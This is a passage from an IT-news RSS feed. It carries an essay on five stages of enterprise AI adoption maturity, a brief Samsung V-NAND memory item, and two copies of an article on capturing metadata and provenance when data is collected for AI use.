<a class="slashpop" href="http://twitter.com/home?status=NVMe+Polishes+Its+Specs%2C+Brings+Virtualization+to+Locally+Attached+SSDs%3A+https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F08%2F04%2F2326236%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fhardware.slashdot.org%2Fstory%2F26%2F08%2F04%2F2326236%2Fnvme-polishes-its-specs-brings-virtualization-to-locally-attached-ssds%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://hardware.slashdot.org/story/26/08/04/2326236/nvme-polishes-its-specs-brings-virtualization-to-locally-attached-ssds?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The 5 stages of AI adoption maturity: Where businesses create real value]]></title>
<description><![CDATA[Most enterprises are rushing toward autonomous AI. They shouldn’t. Autonomy you haven’t earned doesn’t speed you up. In fact, it slows you down.



Here’s what I’ve moved our organization toward: a five-stage set of AI adoption maturity benchmarks. It’s a practical framework for understanding whe...]]></description>
<link>https://tsecurity.de/de/3705636/it-nachrichten/the-5-stages-of-ai-adoption-maturity-where-businesses-create-real-value/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705636/it-nachrichten/the-5-stages-of-ai-adoption-maturity-where-businesses-create-real-value/</guid>
<pubDate>Wed, 05 Aug 2026 13:48:35 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Most enterprises are rushing toward autonomous AI. They shouldn’t. Autonomy you haven’t earned doesn’t speed you up. In fact, it slows you down.</p>



<p class="wp-block-paragraph">Here’s what I’ve moved our organization toward: a five-stage set of AI adoption maturity benchmarks. It’s a practical framework for understanding where employee development, decision-making and business value intersect. Each stage provides value for your organization. Some roles and functions may only ever reach Stage 1 or 2, while others should be fast-tracked to Stage 5. By understanding this progression, leadership can stop viewing AI as a tool for task delegation and treat it as a catalyst for developing stronger, more decisive and more valuable teams.</p>



<h2 class="wp-block-heading">Stage 1: Research assistance</h2>



<p class="wp-block-paragraph">You hand people a premium ChatGPT account. Employees stop Googling and start prompting. Their experience improves: no ads, paragraph-form answers instead of blue links. But the underlying dynamic hasn’t changed. Output quality depends on input quality. A vague Google search returns a mess of links. A vague ChatGPT prompt returns a well-formatted mess of paragraphs. If your team didn’t know how to ask a precise question before, they still don’t.<br>           <br>The real danger at Stage 1 isn’t the bad answers – it’s the <a href="https://link.springer.com/article/10.3758/s13421-025-01755-4">confident-sounding</a> ones. A hallucinated statistic arrives in the same calm, authoritative prose as an accurate one. Teams that don’t verify sources in Google don’t suddenly fact-check ChatGPT. Before moving to Stage 2, your team needs to develop the instinct to ask, “How do I know this is true?”</p>



<h2 class="wp-block-heading">Stage 2: Task assistance</h2>



<p class="wp-block-paragraph">The next stage uses AI tools to complete tasks. It starts simply: “I need to write this email,” or “Make a spreadsheet to track open items.”</p>



<p class="wp-block-paragraph">The average employee takes what AI produces and passes it off without revision. At best, their efforts pass muster, with only a dash of <a href="https://hbr.org/2025/09/ai-generated-workslop-is-destroying-productivity">workslop</a>. At worst, the flood of unchecked AI outputs creates rework for teammates and clients.</p>



<p class="wp-block-paragraph">Another employee further along in Stage 2 may augment what AI produces. That impulse serves them well. But if they default to editing AI output rather than dictating the rules for what AI should produce, they can easily spend more time editing AI’s work than creating work from scratch.</p>



<p class="wp-block-paragraph">For employees whose work will largely remain in Stage 2, the focus should be on writing more precise prompts. The instinct to edit AI output isn’t wrong. The problem arises when the prompt is a rough starting point rather than a detailed spec. AI cares that your instructions are clear, specific and unambiguous. Get the spec right up front.</p>



<h2 class="wp-block-heading">Stage 3: Workflow integration</h2>



<p class="wp-block-paragraph">My daughter’s class recently had an assignment: write a paper on the causes of the Civil War.</p>



<p class="wp-block-paragraph">Her teacher knew what was going to happen. Every 11-year-old would go home and use ChatGPT to write a five-paragraph essay. So, she changed the exercise. The class generated and printed out the essay. Then, the teacher explained how to annotate, how to ask follow-up questions and how to revise in ChatGPT using the marked-up draft.<br><br>The same three-step sequence — assemble context, build the prompt, edit hard — applies when someone writes a post-mortem. The temptation is to skip straight to the draft. Pull the incident data, ask Gemini for a timeline and root cause analysis, clean it up, get a quick peer review and send it.<br><br>An engineer working at Stage 3 does what the teacher did. First, they assemble context: the Slack thread where someone flagged the anomaly two hours before the alert fired, the Jira ticket, the gap in monitoring that nobody documented. Then they build a prompt that reflects the full context and generate a draft. Now the red pen comes out: push back on the root cause analysis, add the institutional context Gemini couldn’t know, tighten the remediation steps until they’re actionable.</p>



<p class="wp-block-paragraph">The result is a better document — and an engineer who understands what failed and builds a better repeatable process. Saving time on a first draft is a fine side effect. The goal is to produce a final draft that’s worthy of review.</p>



<h2 class="wp-block-heading">Stage 4: Guided automation</h2>



<p class="wp-block-paragraph">The fourth stage is where collaboration becomes self-sustaining. You’re no longer asking AI to help you do a task. You’re asking it to run the task and surface the decisions that require your judgment.</p>



<p class="wp-block-paragraph">My LinkedIn workflow is a good example of what this looks like in practice.</p>



<p class="wp-block-paragraph">A couple of years ago, I would read an article, develop a point of view, write two or three paragraphs and publish. Not bad, but dependent on me having the time and cognitive bandwidth.</p>



<p class="wp-block-paragraph">The friction was the 15 decisions that came before drafting: Which angle is worth pursuing? Does this use my voice? Have I said this before?</p>



<p class="wp-block-paragraph">So, I started researching my patterns. First, I fed Claude my prior LinkedIn posts and prompted it to analyze my tone, sentence patterns and structural habits. I didn’t ask it to “describe my voice” – that gets you a paragraph of flattering generalities. This analysis became the base layer of the tool.</p>



<p class="wp-block-paragraph">Then I added a second layer: LinkedIn-specific rules and AI writing patterns to avoid. That context got embedded alongside the voice analysis.</p>



<p class="wp-block-paragraph">Now the workflow runs like this. I click a link, save the article, highlight and annotate the sections that interest me. My Claude Managed Agent picks up the annotation, infers what I found worth engaging with and writes four drafts with meaningfully different angles on the source material. It compares each draft against my post history and proposes two. I read the proposals, pick one, edit and authorize publication with Buffer.<br><br>The automation didn’t remove my judgment from the process. It freed me from work that didn’t depend on judgment. Now I do the work that matters: deciding what to say, identifying patterns and sharing my point of view.</p>



<p class="wp-block-paragraph">That shift in what I’m accountable for is where the ROI changes. The value isn’t in the time saved on any single post. It’s that the workflow no longer depends on me having the bandwidth to start from zero. The capacity was always there; the system makes it consistent and repeatable.</p>



<h2 class="wp-block-heading">Stage 5: Full automation</h2>



<p class="wp-block-paragraph">The most advanced stage of maturity is when the system largely runs on its own. You’re no longer managing step-by-step actions; you’re defining goals, setting guardrails and measuring outcomes.</p>



<p class="wp-block-paragraph">We have one running in our engineering org right now. When a ticket gets escalated from our support team to engineering, the agent triages it and routes it to the team responsible for the fix. When an engineering manager reassigns the ticket – because the routing was wrong – the agent picks up that correction, feeds it back into its prompt tooling and updates its model of who owns what. We’re now extending it further: the agent is learning which parts of the codebase need to change and which engineers are likely to own the fix.</p>



<p class="wp-block-paragraph">There’s a critical catch: this stage only works if you’ve earned your way there. We learned this firsthand. When we first rolled out the routing agent, we used a static map of application areas to engineering teams and assumed that was enough. It wasn’t. We couldn’t reliably distinguish front-end bugs from back-end ones, so the front-end team kept getting tickets caused by a misbehaving API. Features were split between teams in ways the map didn’t capture — one team owned exports, another owned reports. Before the routing could work, the knowledge had to exist somewhere it could be used. An autonomous system is only as good as the foundation beneath it – the clarity of your workflows, the health of your data, the alignment of your teams. Deploy an autonomous agent into a broken process and you get bad results at scale. You cannot safely delegate what you don’t fully understand.</p>



<p class="wp-block-paragraph">This is why racing straight to Stage 5 often fails. You need to know what “good” output looks like (Stages 2 and 3) and how to orchestrate the pieces (Stage 4) before you can confidently take your hands off the wheel.</p>



<h2 class="wp-block-heading">Where business value emerges</h2>



<p class="wp-block-paragraph">The evolution from a premium search engine to an autonomous system is an organizational challenge, not a technology one. Realizing the <a href="https://www.cio.com/article/4157498/kpmg-report-finds-enterprise-disconnect-between-ai-and-its-roi.html">value of AI</a> is determined not by the sophistication of the underlying model, but by the maturity of the team wielding it.</p>



<p class="wp-block-paragraph">The practical move isn’t to audit your whole organization’s AI readiness. Start with one workflow. Push it one stage higher. Measure what changes. That’s how you find out if this matters in your specific context – not in theory, but in the work your team actually does.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Samsung Debuts Next-Gen Vertical AI Memory]]></title>
<description><![CDATA[Samsung Electronics says V10 Bonding V-NAND tech could help increase density and improve performance for AI workloads
Read more →
The post Samsung Debuts Next-Gen Vertical AI Memory appeared first on IT Security News.]]></description>
<link>https://tsecurity.de/de/3705495/it-security-nachrichten/samsung-debuts-next-gen-vertical-ai-memory/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705495/it-security-nachrichten/samsung-debuts-next-gen-vertical-ai-memory/</guid>
<pubDate>Wed, 05 Aug 2026 12:18:15 +0200</pubDate>
<content:encoded><![CDATA[<p>Samsung Electronics says V10 Bonding V-NAND tech could help increase density and improve performance for AI workloads</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/samsung-debuts-next-gen-vertical-ai-memory/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/samsung-debuts-next-gen-vertical-ai-memory/">Samsung Debuts Next-Gen Vertical AI Memory</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Never mind clean data. Annotate as you collect it.]]></title>
<description><![CDATA[Generative AI is notoriously eager to help, to the point that if it can’t find something matching what you ask for, it’ll create it. So the problem with relying on guardrails is that all too often, a model will be wrong, showing a high confidence score for an incorrect answer because it’s relying...]]></description>
<link>https://tsecurity.de/de/3705489/it-security-nachrichten/never-mind-clean-data-annotate-as-you-collect-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705489/it-security-nachrichten/never-mind-clean-data-annotate-as-you-collect-it/</guid>
<pubDate>Wed, 05 Aug 2026 12:14:38 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Generative AI is notoriously eager to help, to the point that if it can’t find something matching what you ask for, it’ll create it. So the problem with relying on guardrails is that all too often, a model will be wrong, showing a high confidence score for an incorrect answer because it’s relying on stale or non-canonical data.</p>



<p class="wp-block-paragraph">Not only do you need to be able to track the lineage of data your model uses from source to token, something the <a href="https://digital-strategy.ec.europa.eu/en/faqs/guidelines-and-code-practice-transparent-ai-systems?ref=distributedthoughts.org">EU AI Act requires</a>, you also need to be able to take into account where the data came from, whether it’s <a href="https://www.hbs.edu/faculty/Pages/item.aspx?num=58832&amp;ref=distributedthoughts.org">out of date</a>, if it changed in a way that affects the result, or if it was never really relevant or authoritative in the first place.</p>



<p class="wp-block-paragraph">Gartner expects organizations will abandon 60% of AI projects because they don’t have the right <a href="https://www.gartner.com/en/newsroom/press-releases/2025-02-26-lack-of-ai-ready-data-puts-ai-projects-at-risk">metadata management, data quality, and data observability</a>. IBM’s acquisition of Confluent also highlights the importance of real-time data with lineage, governance, and policy for AI agents, and <a href="https://www.ibm.com/think/news/ai-tech-trends-predictions-2026?ref=distributedthoughts.org">one of IBM’s 2026 predictions</a> was the importance of smarter data.</p>



<p class="wp-block-paragraph">The usual approach is adding metadata and validation later in the data pipeline. That’s similar to the way the bronze, silver, and gold tiers of typical lakehouse architecture are supposed to represent how filtering, cleaning, and augmenting data improves structure and quality until it’s ready to use. That can mean an enormous amount of work since nearly three quarters of the CPU work in training a frontier model is data cleansing and validation.</p>



<p class="wp-block-paragraph">But that can also remove a lot of the context crucial for gen AI. Rather than <a href="https://www.cio.com/article/3611247/when-is-data-too-clean-to-be-useful-for-enterprise-ai.html">cleaning data and losing the original context</a>, it’s often more effective to keep as much information about the original state of the data, says David Aronchick, open-source platform Kubeflow founder, and CEO of distributed data pipeline vendor Expanso. “You can’t pursue exactly purely clean data; that’s just not possible,” he says. “As you pull data into your ML model, every line should have some mechanism saying where it came from. Otherwise, you’re never really going to know because you can’t mix them together and tease them apart later. You can search your raw content, your raw logs, but it’s just not going to be there.”</p>



<p class="wp-block-paragraph">IoT digital twin systems often tag data all the way back to the device capturing it so you can see whether a temperature spike is a critical failure, which you want to react to, or a routine calibration, which you don’t. But that information may well be relevant down the line when you want to use that data more broadly. So unless you capture at least some elements about the source of data before you move it, you’re not going to be able to easily reconstruct the context later, or at all sometimes.</p>



<p class="wp-block-paragraph">Ulrik Hansen, co-CEO of Encord, a platform for managing and annotating data, calls this in-stream labelling and cautions it’s not an alternative to cleansing data. “Dirty conflates two things: actual corruption you should fix, and context dependence, where a reading only looks anomalous because you threw away the frame that explained it,” he says. “Cleansing kills both. The point isn’t to stop cleaning, it’s to stop normalizing away context you can never recover.”</p>



<p class="wp-block-paragraph">Context can be cheap to capture at the source and nearly impossible to recover after, he adds. “The question isn’t whether to keep it,” he says, “it’s about curating what actually helps.”</p>



<h2 class="wp-block-heading">Raw but not rancid</h2>



<p class="wp-block-paragraph">Aronchick characterizes the state of most bronze tiers as toxic waste because raw data doesn’t get validated before ingestion, or have a metadata wrapper on each data point. “You’ve taken raw data and stripped it of context,” he says.</p>



<p class="wp-block-paragraph">Take a wind farm operator, for instance. When sensor data about the turbines is generated, it comes from a particular turbine at a particular position in a specific wind farm at a known location, running at a specific speed in specific weather conditions, at a particular time. “If you have other turbines also working in the field, the performance of your turbine will go down, but the field performance will go up,” says Aronchick. “The performance of your turbine going down isn’t a negative, but unless you have the context at the point of data collection, you’re going to make your life much harder later on, when someone asks about the efficiency.”</p>



<p class="wp-block-paragraph">Metadata needs to be much richer, and it needs to be added as early in your data pipeline as possible when you have the most detail available to make sense of the structure and complexity of the data, Aronchick adds. “You want to capture as much about the data you’re collecting as possible, where it doesn’t require insane activity to do so.”</p>



<p class="wp-block-paragraph">But not all the metadata you need will be generated with the data, he says. You almost certainly need to augment and annotate your data, and provide extra structure, especially for something like a point of sale system with very light metadata. “Data comes off these things in poor structure,” he says. “It’s not OpenLineage, it’s often a CSV or a text record, and you have to reconstruct them into a full structured log. So do smart things where you’re creating data. That might be compressing, sampling, converting, appending metadata to it, and enforcing schema and lineage all before you start moving anything.”</p>



<p class="wp-block-paragraph">That doesn’t have to mean bloating your data, Hansen points out. He suggests capturing what’s free and unrecoverable. “The system of origin is the label,” he says. “You don’t tag HR policy, you capture that it came from the HR system. Anything a model can derive later, you can skip.”</p>



<h2 class="wp-block-heading">Structure isn’t static</h2>



<p class="wp-block-paragraph">Routine changes to APIs, schemas, and how data is collected or stored happen in every organization, and need to be reflected in metadata that lives alongside the data or added as data is collected, not reconstructed later in a fragile process that depends on knowing about all those changes. Google’s research into these <a href="https://research.google/blog/data-cascades-in-machine-learning/">data cascades</a> shows how easily context gets lost and how badly it affects data quality.</p>



<p class="wp-block-paragraph">Shifting schema enforcement further left in your data pipeline so you deal with it as soon as possible allows you to make more effective downstream decisions. For a sensor recording temperature and humidity, you need to know the temperature scale it uses, readings, and how the timestamp is recorded. Checking that against the schema before ingesting the data lets you route it differently depending on whether it validates or triggers alerts about data quality.</p>



<p class="wp-block-paragraph">“Maybe I’ll delete it, or send it off to some place where a human being or other tooling can reconstruct it into something valuable,” says Aronchick. “But what it doesn’t do is allow the polluted or bad data into my pipeline. Saying whether or not something passed your schema makes your downstream systems much more reliable.”</p>



<h2 class="wp-block-heading">Sensing structure</h2>



<p class="wp-block-paragraph">Unstructured and semistructured data needs more augmentation. A PDF or Word document has an author and a creation date, but doesn’t necessarily include any context about the job title and department of the author, whether it’s up to date, only applies to a particular group of customers, or is based on accounting regulations that can change. If that information is available, it needs to travel with the document, not be left in a compliance spreadsheet.</p>



<p class="wp-block-paragraph">Data platforms like DataHub and SurrealDB both capture and create context. The latter can analyze a photo, for instance, using vision AI to understand what’s in the image. “From completely unstructured data, we get as much structure as possible,” says the company’s CEO Tobie Morgan Hitchcock.</p>



<p class="wp-block-paragraph">That’s paired with other data potentially useful for an AI agent down the line. “Understanding what happened around an event becomes a lot easier if you’re tracking the conversation, telemetry, tool and model usage, geospatial data, and the vector search and relationships,” he says. “You’re going to have a far better chance of getting an accurate understanding of that data, which started off completely unstructured, than if you weren’t capturing anything.”</p>



<p class="wp-block-paragraph">Metadata about document authors, which might come from the company directory, can show how much authority a document has. He describes that as building an understanding of what trust and provenance is over time by the weight and authority of who’s updating the information. After all, he says, company-generated information has more trust or can have traced provenance compared to conversational inputs from a user.</p>



<h2 class="wp-block-heading">Incentives for annotating</h2>



<p class="wp-block-paragraph">DataHub CTO Shirshanka Das saw how much of a mess data can be even with strong guidelines as former architect of LinkedIn’s GDPR strategy. “The data was a swamp, despite us having had pretty good data-first and schema-first practices,” he says. As well as cleaning up the data governance, they added in the first nuggets of the DevOps’ ‘shift left’ approach.</p>



<p class="wp-block-paragraph">LinkedIn already required data checked in to its Kafka ecosystem to have a schema, and ran CI/CD pipelines to check backward compatibility. “I attached metadata attribution and collection around compliance metadata into that pipeline, where developers weren’t able to check in a schema until they had declared what every column meant.”</p>



<p class="wp-block-paragraph">The extra work was unpopular until teams who didn’t participate saw the flood of tickets that came their way, which allowed him to extend that same proactive governance and annotation at source approach to pretty much every data set being produced.</p>



<p class="wp-block-paragraph">“The starting point of data at most companies is a lot more swampy,” he says. “Many people are using Kafka, which is a very schema forward system, and yet they’re just shoving in JSON and unstructured stuff.”</p>



<p class="wp-block-paragraph">That’s common, agrees Megha Kumar, research VP for analytics and AI at IDC, because while collecting more metadata provides better context and cleaner data lineage, it’s hard in practice. “Most organizations batch process data, so real-time context capture rarely happens,” she says. “Even the ones that process in real-time tend to have pre-defined schemas, so adding context requires changes to the data, which unfortunately happens later.”</p>



<p class="wp-block-paragraph">People don’t know how to start, says Das, so DataHub Cloud tries to add back context by collecting operational metadata from multiple systems, including queries and BI tools to extrapolate a semantic model. “We confront the mess by giving them something they can react to,” he says. “They can quickly validate, and then it starts becoming a governance layer on top where humans annotate at source.”</p>



<p class="wp-block-paragraph">Online whiteboard provider Miro, for example, dramatically improved AI agent query accuracy from about 50% to 90% using DataHub. Then they applied GitOps principles on top of what was inferred with a human in the loop for approvals.</p>



<p class="wp-block-paragraph">So getting people to do the work happened the same way at LinkedIn, says Das. “When a data scientist gets 10 times more requests because they didn’t document their work well, resulting in the AI making lots of mistakes and stakeholders constantly pinging them for answers, they have the incentive to add the annotation when they produce an analysis, because then they get out of the critical path.”</p>



<h2 class="wp-block-heading">DBOMs and data contracts</h2>



<p class="wp-block-paragraph">Provenance and lineage of data is critical, Aronchick says, so you can preserve details like who collected the data, when, from where, if the source was authoritative or canonical, what transformations were run, and exactly what the model saw.</p>



<p class="wp-block-paragraph">“It’s not just about the version and the metadata,” he says. “Where things really start to change is when you can say along the way this data has gone through these steps, this is the root source, and these were the other elements.” You want to be able to find out if there were any experimental flags, like a new customer campaign running when it was collected, as well as what claims the data contributes to.</p>



<p class="wp-block-paragraph">Aronchick advocates for a SLSA-style data bill of materials using a tool like <a href="https://usemakoto.dev/">Makoto</a>, which can add signed provenance and attestation to simplify applying central concepts of governance and structure to upstream data.</p>



<p class="wp-block-paragraph">The notion of a data contract or a data product spec is starting to become common in the financial sector says Das, defining it as a data set, or a group of data sets, bound together by a contract that defines expectations which aren’t just cosmetic but machine verifiable. They can also include operational SLOs for APIs as contracts describe not just the shape of the data but operational characteristics and guarantees.</p>



<p class="wp-block-paragraph">Document graph markup language (DGML), a new open source specification from Docugami, promises provenance down to individual data points automatically extracted from documents.</p>



<p class="wp-block-paragraph">“It’s critical to know the validity and provenance of the information your AI is relying on,” Docugami CEO and XML co-creator Jean Paoli says. “Establishing the validity of data right from the start, at scale, is vital and far more efficient than trying to clean up bad data later.” DGML combines semantic tags describing what content means in its business context with bounding boxes showing exactly where in the document the content comes from, with attestation to prove it.</p>



<h2 class="wp-block-heading">AI demands provenance</h2>



<p class="wp-block-paragraph">All this context is the kind of metadata <a href="https://www.anthropic.com/engineering/effective-context-engineering-for-ai-agents?ref=distributedthoughts.org">Anthropic’s context engineering guide</a> recommends feeding to agents for accuracy. Developers are already used to giving coding agents more context, Das argues. “The same thing is happening with data, as when people realize when AI agents can’t make sense of what they’re doing, hallucinations happen,” he says.</p>



<p class="wp-block-paragraph">Kumar agrees that organizations realize agents need context to provide better insights. “In many cases, it has to do with ensuring the existing data had clear semantics and relationships,” she says.</p>



<p class="wp-block-paragraph">If you want to make sure the purchase return window an AI chatbot promises customers is based on your own policy, not a wish list from a user forum, you need rich context. It’s not just metadata. Organizations need to have semantics, data lineage, and ontologies. “Many are also building knowledge and ontology graphs,” adds Kumar. “By ensuring the systems understand what the data means, it’ll be able to provide a better response.”</p>



<p class="wp-block-paragraph">And if you’re going to the expense of fine tuning, which needs relevant and domain- or task-specific examples, you don’t want noise, duplication, or irrelevant content in your data. You can, of course, exclude poor data if it’s annotated and verified earlier, but you can also improve model performance with extra information, Aronchick points out. “The augmentation of the existing data makes the data you pull out more valuable,” he says.</p>



<p class="wp-block-paragraph">Expanso recently <a href="https://expanso.io/news/edge-ai-startup-of-the-year-2026/">won an Edge AI award</a> for fine tuning a base level model with only about 3,200 images by augmenting them with metadata. “The reason it worked on that few is because I could tell it deterministically what was in the frame,” he adds. “It’s labeling at the point of capture instead of paying somebody to label it later. What if I developed models for predictive analytics of store behavior on a per city, region, or country basis? If I’m able to take the raw point of sale information and augment it with additional metadata, I’m turning this into a much easier thing to fine tune.”</p>



<p class="wp-block-paragraph">Or you might even avoid the expense of fine tuning entirely, suggests Das. “You get the short-term advantage by fine-tuning and getting great performance at much cheaper cost on a smaller model, and it gets stripped away in a couple of months as a new model shows up,” he says. “You have to always run that calculus of when’s the right threshold to fine tune an existing model, distil it, and then run it for a fair amount of time to recoup the costs of fine tuning.”</p>



<p class="wp-block-paragraph">Although regulated or slow-moving industries will see benefits from fine tuning a model they can run for six to 12 months on data with higher quality and better provenance, many organizations may use the improved data quality to get good results without fine tuning.</p>



<p class="wp-block-paragraph">“We’re taking a more knowledge graph-oriented approach to grounding the model, and betting on the fact that because the knowledge graph is changing often, it’s better to keep it as a runtime artifact than a baked-in one.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Never mind clean data. Annotate as you collect it.]]></title>
<description><![CDATA[Generative AI is notoriously eager to help, to the point that if it can’t find something matching what you ask for, it’ll create it. So the problem with relying on guardrails is that all too often, a model will be wrong, showing a high confidence score for an incorrect answer because it’s relying...]]></description>
<link>https://tsecurity.de/de/3705480/it-nachrichten/never-mind-clean-data-annotate-as-you-collect-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3705480/it-nachrichten/never-mind-clean-data-annotate-as-you-collect-it/</guid>
<pubDate>Wed, 05 Aug 2026 12:08:20 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Generative AI is notoriously eager to help, to the point that if it can’t find something matching what you ask for, it’ll create it. So the problem with relying on guardrails is that all too often, a model will be wrong, showing a high confidence score for an incorrect answer because it’s relying on stale or non-canonical data.</p>



<p class="wp-block-paragraph">Not only do you need to be able to track the lineage of data your model uses from source to token, something the <a href="https://digital-strategy.ec.europa.eu/en/faqs/guidelines-and-code-practice-transparent-ai-systems?ref=distributedthoughts.org">EU AI Act requires</a>, you also need to be able to take into account where the data came from, whether it’s <a href="https://www.hbs.edu/faculty/Pages/item.aspx?num=58832&amp;ref=distributedthoughts.org">out of date</a>, if it changed in a way that affects the result, or if it was never really relevant or authoritative in the first place.</p>



<p class="wp-block-paragraph">Gartner expects organizations will abandon 60% of AI projects because they don’t have the right <a href="https://www.gartner.com/en/newsroom/press-releases/2025-02-26-lack-of-ai-ready-data-puts-ai-projects-at-risk">metadata management, data quality, and data observability</a>. IBM’s acquisition of Confluent also highlights the importance of real-time data with lineage, governance, and policy for AI agents, and <a href="https://www.ibm.com/think/news/ai-tech-trends-predictions-2026?ref=distributedthoughts.org">one of IBM’s 2026 predictions</a> was the importance of smarter data.</p>



<p class="wp-block-paragraph">The usual approach is adding metadata and validation later in the data pipeline. That’s similar to the way the bronze, silver, and gold tiers of typical lakehouse architecture are supposed to represent how filtering, cleaning, and augmenting data improves structure and quality until it’s ready to use. That can mean an enormous amount of work since nearly three quarters of the CPU work in training a frontier model is data cleansing and validation.</p>



<p class="wp-block-paragraph">But that can also remove a lot of the context crucial for gen AI. Rather than <a href="https://www.cio.com/article/3611247/when-is-data-too-clean-to-be-useful-for-enterprise-ai.html">cleaning data and losing the original context</a>, it’s often more effective to keep as much information about the original state of the data, says David Aronchick, open-source platform Kubeflow founder, and CEO of distributed data pipeline vendor Expanso. “You can’t pursue exactly purely clean data; that’s just not possible,” he says. “As you pull data into your ML model, every line should have some mechanism saying where it came from. Otherwise, you’re never really going to know because you can’t mix them together and tease them apart later. You can search your raw content, your raw logs, but it’s just not going to be there.”</p>



<p class="wp-block-paragraph">IoT digital twin systems often tag data all the way back to the device capturing it so you can see whether a temperature spike is a critical failure, which you want to react to, or a routine calibration, which you don’t. But that information may well be relevant down the line when you want to use that data more broadly. So unless you capture at least some elements about the source of data before you move it, you’re not going to be able to easily reconstruct the context later, or at all sometimes.</p>



<p class="wp-block-paragraph">Ulrik Hansen, co-CEO of Encord, a platform for managing and annotating data, calls this in-stream labelling and cautions it’s not an alternative to cleansing data. “Dirty conflates two things: actual corruption you should fix, and context dependence, where a reading only looks anomalous because you threw away the frame that explained it,” he says. “Cleansing kills both. The point isn’t to stop cleaning, it’s to stop normalizing away context you can never recover.”</p>



<p class="wp-block-paragraph">Context can be cheap to capture at the source and nearly impossible to recover after, he adds. “The question isn’t whether to keep it,” he says, “it’s about curating what actually helps.”</p>



<h2 class="wp-block-heading">Raw but not rancid</h2>



<p class="wp-block-paragraph">Aronchick characterizes the state of most bronze tiers as toxic waste because raw data doesn’t get validated before ingestion, or have a metadata wrapper on each data point. “You’ve taken raw data and stripped it of context,” he says.</p>



<p class="wp-block-paragraph">Take a wind farm operator, for instance. When sensor data about the turbines is generated, it comes from a particular turbine at a particular position in a specific wind farm at a known location, running at a specific speed in specific weather conditions, at a particular time. “If you have other turbines also working in the field, the performance of your turbine will go down, but the field performance will go up,” says Aronchick. “The performance of your turbine going down isn’t a negative, but unless you have the context at the point of data collection, you’re going to make your life much harder later on, when someone asks about the efficiency.”</p>



<p class="wp-block-paragraph">Metadata needs to be much richer, and it needs to be added as early in your data pipeline as possible when you have the most detail available to make sense of the structure and complexity of the data, Aronchick adds. “You want to capture as much about the data you’re collecting as possible, where it doesn’t require insane activity to do so.”</p>



<p class="wp-block-paragraph">But not all the metadata you need will be generated with the data, he says. You almost certainly need to augment and annotate your data, and provide extra structure, especially for something like a point of sale system with very light metadata. “Data comes off these things in poor structure,” he says. “It’s not OpenLineage, it’s often a CSV or a text record, and you have to reconstruct them into a full structured log. So do smart things where you’re creating data. That might be compressing, sampling, converting, appending metadata to it, and enforcing schema and lineage all before you start moving anything.”</p>



<p class="wp-block-paragraph">That doesn’t have to mean bloating your data, Hansen points out. He suggests capturing what’s free and unrecoverable. “The system of origin is the label,” he says. “You don’t tag HR policy, you capture that it came from the HR system. Anything a model can derive later, you can skip.”</p>



<h2 class="wp-block-heading">Structure isn’t static</h2>



<p class="wp-block-paragraph">Routine changes to APIs, schemas, and how data is collected or stored happen in every organization, and need to be reflected in metadata that lives alongside the data or added as data is collected, not reconstructed later in a fragile process that depends on knowing about all those changes. Google’s research into these <a href="https://research.google/blog/data-cascades-in-machine-learning/">data cascades</a> shows how easily context gets lost and how badly it affects data quality.</p>



<p class="wp-block-paragraph">Shifting schema enforcement further left in your data pipeline so you deal with it as soon as possible allows you to make more effective downstream decisions. For a sensor recording temperature and humidity, you need to know the temperature scale it uses, readings, and how the timestamp is recorded. Checking that against the schema before ingesting the data lets you route it differently depending on whether it validates or triggers alerts about data quality.</p>



<p class="wp-block-paragraph">“Maybe I’ll delete it, or send it off to some place where a human being or other tooling can reconstruct it into something valuable,” says Aronchick. “But what it doesn’t do is allow the polluted or bad data into my pipeline. Saying whether or not something passed your schema makes your downstream systems much more reliable.”</p>



<h2 class="wp-block-heading">Sensing structure</h2>



<p class="wp-block-paragraph">Unstructured and semistructured data needs more augmentation. A PDF or Word document has an author and a creation date, but doesn’t necessarily include any context about the job title and department of the author, whether it’s up to date, only applies to a particular group of customers, or is based on accounting regulations that can change. If that information is available, it needs to travel with the document, not be left in a compliance spreadsheet.</p>



<p class="wp-block-paragraph">Data platforms like DataHub and SurrealDB both capture and create context. The latter can analyze a photo, for instance, using vision AI to understand what’s in the image. “From completely unstructured data, we get as much structure as possible,” says the company’s CEO Tobie Morgan Hitchcock.</p>



<p class="wp-block-paragraph">That’s paired with other data potentially useful for an AI agent down the line. “Understanding what happened around an event becomes a lot easier if you’re tracking the conversation, telemetry, tool and model usage, geospatial data, and the vector search and relationships,” he says. “You’re going to have a far better chance of getting an accurate understanding of that data, which started off completely unstructured, than if you weren’t capturing anything.”</p>



